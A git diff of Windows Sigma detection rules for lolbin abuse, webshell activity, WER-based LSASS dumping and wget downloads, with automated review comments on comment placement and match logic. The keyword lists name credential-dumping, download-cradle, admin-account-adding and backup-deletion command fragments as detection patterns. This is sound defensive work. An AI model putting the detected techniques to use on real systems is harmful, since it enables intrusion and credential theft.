"VSDiagnostics.exe" with the "start" command in - order to launch and proxy arbitrary binaries. +description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. references: - https://twitter.com/0xBoku/status/1679200664013135872 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VSDiagnostics.exe - - OriginalFileName: VSDiagnostics.exe + - NewProcessName|endswith: \VSDiagnostics.exe + - OriginalFileName: VSDiagnostics.exe selection_cli_start: - CommandLine|contains: start + CommandLine|contains: start selection_cli_launch: - CommandLine|contains: + CommandLine|contains: - ' /launch:' - ' -launch:' condition: process_creation and (all of selection_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml b/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml index e8339cf15..2c4268eb0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml @@ -1,8 +1,7 @@ title: Suspicious Vsls-Agent Command With AgentExtensionPath Load id: 43103702-5886-11ed-9b6a-0242ac120002 status: test -description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with - a suspicious library load using the --agentExtensionPath parameter +description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter references: - https://twitter.com/bohops/status/1583916360404729857 author: bohops @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --agentExtensionPath - NewProcessName|endswith: \vsls-agent.exe + CommandLine|contains: --agentExtensionPath + NewProcessName|endswith: \vsls-agent.exe filter: - CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. + CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_w32tm.yml b/sigma/builtin/process_creation/proc_creation_win_w32tm.yml index a2cc8252d..8b0ad8ecd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_w32tm.yml +++ b/sigma/builtin/process_creation/proc_creation_win_w32tm.yml 
@@ -1,8 +1,7 @@ title: Use of W32tm as Timer id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 status: test -description: When configured with suitable command line arguments, w32tm can act as - a delay mechanism +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_w32tm: - - NewProcessName|endswith: \w32tm.exe - - OriginalFileName: w32time.dll + - NewProcessName|endswith: \w32tm.exe + - OriginalFileName: w32time.dll selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - /stripchart - '/computer:' - '/period:' diff --git a/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml b/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml index 5c9c25be3..39d22fee8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml @@ -1,8 +1,7 @@ title: Wab Execution From Non Default Location id: 395907ee-96e5-4666-af2e-2ca91688e151 status: test -description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft - Address Book Import Tool) from non default locations as seen with bumblebee activity +description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime 
@@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \wab.exe - \wabmig.exe filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\WinSxS\ - C:\Program Files\Windows Mail\ - C:\Program Files (x86)\Windows Mail\ diff --git a/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml b/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml index 0febb7b81..be3a30e7a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml @@ -1,9 +1,7 @@ title: Wab/Wabmig Unusual Parent Or Child Processes id: 63d1ccc0-2a43-4f4b-9289-361b308991ff status: test -description: Detects unusual parent or children of the wab.exe (Windows Contacts) - and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used - with bumblebee activity +description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime @@ -23,16 +21,18 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe - NewProcessName|endswith: + NewProcessName|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentProcessName|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) condition: process_creation and (1 of selection_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml b/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml index db4f4b60f..808fa3378 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml @@ -1,13 +1,10 @@ title: SystemStateBackup Deleted Using Wbadmin.EXE id: 89f75308-5b1b-4390-b2d8-d6b2340efaf8 status: test -description: 'Deletes the Windows systemstatebackup using wbadmin.exe. - +description: | + Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. - This may only be successful on server platforms that have Windows Backup enabled. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 @@ -24,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - NewProcessName|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'delete ' - 'systemstatebackup ' - -keepVersions:0 diff --git a/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml b/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml index 00582ab26..da8dc857b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml 
@@ -1,8 +1,8 @@ title: Potentially Suspicious WebDAV LNK Execution id: 1412aa78-a24c-4abd-83df-767dfb2c5bbe related: - - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 - type: similar + - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 + type: similar status: experimental description: Detects possible execution via LNK file accessed on a WebDAV server. references: @@ -22,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \DavWWWRoot\ + CommandLine|contains: \DavWWWRoot\ ParentProcessName|endswith: \explorer.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml index d42777604..257cf7f45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml @@ -1,8 +1,7 @@ title: Chopper Webshell Process Pattern id: fa3c117a-bc0d-416e-a31b-0c0e80653efb status: test -description: Detects patterns found in process executions cause by China Chopper like - tiny (ASPX) webshells +description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ author: Florian Roth (Nextron Systems), MSTI (query) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_origin: - - NewProcessName|endswith: \w3wp.exe - - ParentProcessName|endswith: \w3wp.exe + - NewProcessName|endswith: \w3wp.exe + - ParentProcessName|endswith: \w3wp.exe selection_cmdline: - CommandLine|contains: + CommandLine|contains: - '&ipconfig&echo' - '&quser&echo' - '&whoami&echo' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml index 7733f0d52..7c77efb44 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml @@ -1,11 +1,8 @@ title: Webshell Hacking Activity Patterns id: 4ebc877f-4612-45cb-b3a5-8e3834db36c9 status: test -description: 'Detects certain parent child patterns found in cases in which a web - shell is used to perform certain credential dumping or exfiltration activities - on a compromised system - - ' +description: | + Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system references: - https://youtu.be/7aemGhaE9ds?t=641 author: Florian Roth (Nextron Systems) @@ -21,6 +18,7 @@ logsource: category: process_creation product: windows detection: + # Webserver process_creation: EventID: 4688 Channel: Security 
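Review bot: The added `# Webserver` comment sits directly above `process_creation:`, the EventID/Channel block every converted rule carries, rather than above the `selection_webserver_characteristics_*` selections it describes, which begin outside this hunk. Move it to precede the first webserver selection, or reword it to `# Generic event selection; webserver characteristics follow` so it does not suggest the 4688/Security filter is webserver-specific.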
@@ -40,55 +38,64 @@ detection: - -tomcat- - \tomcat selection_webserver_characteristics_tomcat2: - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME + # Suspicious child processes ParentProcessName|endswith: - \java.exe - \javaw.exe selection_child_1: - CommandLine|contains|all: + # Process dumping + CommandLine|contains|all: - rundll32 - comsvcs selection_child_2: - CommandLine|contains|all: + # Winrar exfil + CommandLine|contains|all: - ' -hp' - ' a ' - ' -m' selection_child_3: - CommandLine|contains|all: + # User add + CommandLine|contains|all: - net - ' user ' - ' /add' selection_child_4: - CommandLine|contains|all: + CommandLine|contains|all: - net - ' localgroup ' - ' administrators ' - /add selection_child_5: - NewProcessName|endswith: + NewProcessName|endswith: + # Credential stealing - \ntdsutil.exe + # AD recon - \ldifde.exe - \adfind.exe + # Process dumping - \procdump.exe - \Nanodump.exe + # Destruction / ransom groups - \vssadmin.exe - \fsutil.exe selection_child_6: - CommandLine|contains: - - ' -decode ' - - ' -NoP ' - - ' -W Hidden ' - - ' /decode ' - - ' /ticket:' - - ' sekurlsa' - - .dmp full - - .downloadfile( - - .downloadstring( - - FromBase64String - - process call create - - 'reg save ' + # SUspicious patterns + CommandLine|contains: + - ' -decode ' # Used with certutil + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' /decode ' # Used with certutil + - ' /ticket:' # Rubeus + - ' sekurlsa' # Mimikatz + - .dmp full # Process dumping method apart from procdump + - .downloadfile( # PowerShell download command + - .downloadstring( # PowerShell download command + - FromBase64String # PowerShell encoded payload + - process call create # WMIC process creation + - 'reg save ' # save registry SAM - syskey extraction - whoami /priv condition: process_creation and (1 of selection_webserver_* and 1 of selection_child_*) falsepositives: 
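Review bot: The new `# Suspicious child processes` comment is placed inside selection_webserver_characteristics_tomcat2, above its `ParentProcessName|endswith:` list of java.exe/javaw.exe, so it labels the Tomcat parent criteria as child processes; it belongs above `selection_child_1:`. `# SUspicious patterns` has a stray capital. selection_child_4 is the only child selection left without a heading; `# Local admin group add` would keep the set consistent.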
diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml index e5da6e5b7..eb8008c82 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml @@ -1,8 +1,7 @@ title: Webshell Detection With Command Line Keywords id: bed2a484-9348-4143-8a8a-b801c979301c status: test -description: Detects certain command line parameters often used during reconnaissance - activity via web shells +description: Detects certain command line parameters often used during reconnaissance activity via web shells references: - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/ @@ -38,7 +37,7 @@ detection: - -tomcat- - \tomcat selection_webserver_characteristics_tomcat2: - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME ParentProcessName|endswith: 
@@ -48,58 +47,58 @@ detection: OriginalFileName: - net.exe - net1.exe - CommandLine|contains: + CommandLine|contains: - ' user ' - ' use ' - ' group ' selection_susp_ping_utility: OriginalFileName: ping.exe - CommandLine|contains: ' -n ' + CommandLine|contains: ' -n ' selection_susp_change_dir: - CommandLine|contains: - - '&cd&echo' - - 'cd /d ' + CommandLine|contains: + - '&cd&echo' # china chopper web shell + - 'cd /d ' # https://www.computerhope.com/cdhlp.htm selection_susp_wmic_utility: OriginalFileName: wmic.exe - CommandLine|contains: ' /node:' + CommandLine|contains: ' /node:' selection_susp_misc_discovery_binaries: - - NewProcessName|endswith: - - \dsquery.exe - - \find.exe - - \findstr.exe - - \ipconfig.exe - - \netstat.exe - - \nslookup.exe - - \pathping.exe - - \quser.exe - - \schtasks.exe - - \systeminfo.exe - - \tasklist.exe - - \tracert.exe - - \ver.exe - - \wevtutil.exe - - \whoami.exe - - OriginalFileName: - - dsquery.exe - - find.exe - - findstr.exe - - ipconfig.exe - - netstat.exe - - nslookup.exe - - pathping.exe - - quser.exe - - schtasks.exe - - sysinfo.exe - - tasklist.exe - - tracert.exe - - ver.exe - - VSSADMIN.EXE - - wevtutil.exe - - whoami.exe + - NewProcessName|endswith: + - \dsquery.exe + - \find.exe + - \findstr.exe + - \ipconfig.exe + - \netstat.exe + - \nslookup.exe + - \pathping.exe + - \quser.exe + - \schtasks.exe + - \systeminfo.exe + - \tasklist.exe + - \tracert.exe + - \ver.exe + - \wevtutil.exe + - \whoami.exe + - OriginalFileName: + - dsquery.exe + - find.exe + - findstr.exe + - ipconfig.exe + - netstat.exe + - nslookup.exe + - pathping.exe + - quser.exe + - schtasks.exe + - sysinfo.exe + - tasklist.exe + - tracert.exe + - ver.exe + - VSSADMIN.EXE + - wevtutil.exe + - whoami.exe selection_susp_misc_discovery_commands: - CommandLine|contains: + CommandLine|contains: - ' Test-NetConnection ' - - dir \ + - dir \ # remote dir: dir \\C$:\windows\temp\*.exe condition: process_creation and (1 of selection_webserver_* and 1 of 
selection_susp_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml index d80e3bf31..36883847a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml @@ -1,14 +1,11 @@ title: Suspicious Process By Web Server Process id: 8202070f-edeb-4d31-a010-a26c72ac5600 status: test -description: 'Detects potentially suspicious processes being spawned by a web server - process which could be the result of a successfully placed web shell or exploitation - - ' +description: | + Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation references: - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF -author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim - Shelton, Nasreddine Bencherchali (Nextron Systems) +author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/11/11 tags: @@ -30,7 +27,7 @@ detection: - \php-cgi.exe - \php.exe - \tomcat.exe - - \UMWorkerProcess.exe + - \UMWorkerProcess.exe # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - \w3wp.exe - \ws_TomcatService.exe selection_webserver_characteristics_tomcat1: @@ -49,7 +46,7 @@ detection: - \java.exe - \javaw.exe selection_anomaly_children: - NewProcessName|endswith: + NewProcessName|endswith: - \arp.exe - \at.exe - \bash.exe 
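Review bot: In `selection_susp_misc_discovery_binaries` (the hunk starting on the previous line) the `OriginalFileName` alternative carries `VSSADMIN.EXE`, but the parallel `NewProcessName|endswith` alternative has no `\vssadmin.exe`, so on a log source that only provides the image path the binary is never matched. Either add `- \vssadmin.exe` to the image list or drop `VSSADMIN.EXE` so both alternatives cover the same set; the `sysinfo.exe` vs `\systeminfo.exe` pair appears deliberate, since `sysinfo.exe` is the PE original file name of systeminfo.exe. The new comment on `dir \` shows `dir \\C$:\windows\temp\*.exe`, which is not a valid UNC path; `# remote listing over an admin share, e.g. dir \\host\C$\Windows\Temp\*.exe` would be clearer.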
@@ -80,16 +77,14 @@ detection: - \wscript.exe - \wusa.exe filter_main_fp_1: - CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager - "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt + CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt ParentProcessName|endswith: \java.exe filter_main_fp_2: - CommandLine|contains|all: + CommandLine|contains|all: - sc query - ADManager Plus ParentProcessName|endswith: \java.exe - condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children - and not 1 of filter_main_*) + condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children and not 1 of filter_main_*) falsepositives: - Particular web applications may spawn a shell process legitimately level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml index fe06be222..a3bdfe885 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml @@ -1,11 +1,8 @@ title: Webshell Tool Reconnaissance Activity id: f64e5c19-879c-4bae-b471-6d84c8339677 status: test -description: 'Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) - that perform reconnaissance looking for the existence of popular scripting tools - (perl, python, wget) on the system via the help commands - - ' +description: | + Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands references: - https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html author: Cian Heasley, Florian Roth (Nextron Systems) 
@@ -37,14 +34,14 @@ detection: - -tomcat- - \tomcat selection_webserver_characteristics_tomcat2: - CommandLine|contains: + CommandLine|contains: - CATALINA_HOME - catalina.jar ParentProcessName|endswith: - \java.exe - \javaw.exe selection_recon: - CommandLine|contains: + CommandLine|contains: - perl --help - perl -h - python --help diff --git a/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml b/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml index c2f52b9bc..fa163afc5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml +++ b/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml @@ -1,8 +1,7 @@ title: Potential Credential Dumping Via WER id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 status: test -description: Detects potential credential dumping via Windows Error Reporting LSASS - Shtinkering technique which uses the Windows Error Reporting to dump lsass +description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf 
@@ -20,13 +19,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Werfault.exe - - OriginalFileName: WerFault.exe + - NewProcessName|endswith: \Werfault.exe + - OriginalFileName: WerFault.exe selection_cli: - ParentUser|contains: + ParentUser|contains: # covers many language settings - AUTHORI - AUTORI - CommandLine|contains|all: + CommandLine|contains|all: + # Doc: WerFault.exe -u -p -ip -s + # Example: C:\Windows\system32\Werfault.exe -u -p 744 -ip 1112 -s 244 + # If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique + # Example: If the "-p" points the PID of "lsass.exe" and "-ip" points to a different process than "lsass.exe" then this is a sign of malicious activity - ' -u -p ' - ' -ip ' - ' -s ' @@ -37,7 +40,6 @@ detection: ParentProcessName: C:\Windows\System32\lsass.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Windows Error Reporting might produce similar behavior. In that case, check - the PID associated with the "-p" parameter in the CommandLine. + - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml b/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml index b6dfa12ef..4d1e7fcda 100644 --- a/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml 
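Review bot: The comment block added under `selection_cli` describes a PID comparison (`-p` pointing at lsass.exe while `-ip` points elsewhere) that the selection does not perform; the rule matches only the flag shape `-u -p … -ip … -s` plus an `NT AUTHORITY`-style parent user, and the only LSASS-specific element visible is the `ParentProcessName: C:\Windows\System32\lsass.exe` filter line in the next hunk. Rewording it as a triage step avoids a reader assuming the match already proved the target was LSASS, e.g. `# Triage: resolve the PID after -p; the technique is indicated when it is lsass.exe and the PID after -ip belongs to a different process (the rule itself cannot compare PIDs)`. The `# Doc:` line would also read better with placeholders, e.g. `# Doc: WerFault.exe -u -p <target PID> -ip <reporting PID> -s <value>`, so the example beneath it is unambiguous.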
@@ -1,12 +1,10 @@ title: Potential ReflectDebugger Content Execution Via WerFault.EXE id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd related: - - id: 0cf2e1c6-8d10-4273-8059-738778f981ad - type: derived + - id: 0cf2e1c6-8d10-4273-8059-738778f981ad + type: derived status: experimental -description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that - is used to run files stored in the ReflectDebugger key which could be used to - store the path to the malware in order to masquerade the execution flow +description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -24,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WerFault.exe - - OriginalFileName: WerFault.exe + - NewProcessName|endswith: \WerFault.exe + - OriginalFileName: WerFault.exe selection_cli: - CommandLine|contains: ' -pr ' + CommandLine|contains: ' -pr ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml index fd0727aa1..c3a16593b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml 
@@ -1,11 +1,10 @@ title: Suspicious Child Process Of Wermgr.EXE id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e related: - - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 - type: similar + - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child - process +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe @@ -27,7 +26,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \wermgr.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \ipconfig.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml index e02596310..db0597cab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml @@ -1,11 +1,10 @@ title: Suspicious Execution Location Of Wermgr.EXE id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 related: - - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e - type: similar + - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution - location. +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe 
@@ -23,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \wermgr.exe + NewProcessName|endswith: \wermgr.exe filter_main_legit_location: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ - C:\Windows\WinSxS\ diff --git a/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml index 5696c1726..3bc23ec62 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Wget.EXE id: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using Wget.exe +description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe references: - https://www.gnu.org/software/wget/manual/wget.html author: Nasreddine Bencherchali (Nextron Systems) @@ -17,17 +16,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wget.exe - - OriginalFileName: wget.exe + - NewProcessName|endswith: \wget.exe + - OriginalFileName: wget.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" 
diff --git a/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml index fac878235..937d73ab6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Wget.EXE id: a0d7e4d2-bede-4141-8896-bc6e237e977c status: experimental -description: Detects potentially suspicious file downloads from file sharing domains - using wget.exe +description: Detects potentially suspicious file downloads from file sharing domains using wget.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wget.exe - - OriginalFileName: wget.exe + - NewProcessName|endswith: \wget.exe + - OriginalFileName: wget.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -48,12 +47,12 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" 
